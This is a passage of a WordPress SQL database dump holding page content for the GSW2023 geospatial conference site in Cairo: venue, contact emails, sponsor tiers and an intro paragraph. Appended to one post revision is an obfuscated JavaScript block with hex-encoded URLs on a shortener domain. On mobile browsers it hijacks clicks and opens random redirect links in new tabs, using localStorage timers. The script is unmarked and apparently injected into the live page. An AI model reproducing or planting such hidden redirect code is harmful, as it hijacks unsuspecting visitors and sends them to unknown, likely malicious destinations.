-moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-07-11 13:08:27','2023-07-11 13:08:27','',3066,'https://gsw2023.com/?p=5003',0,'revision','',0);
INSERT INTO `dnctiavkr_posts` VALUES
(5004,1,'2023-07-11 13:10:29','2023-07-11 13:10:29','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080816797{margin-top: 80px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081016574{margin-top: 30px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5002\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/logo-300x300.jpg\" alt=\"\" width=\"180\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951146401{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951344645{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 size-full\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"160\" height=\"190\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1687571540500{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" 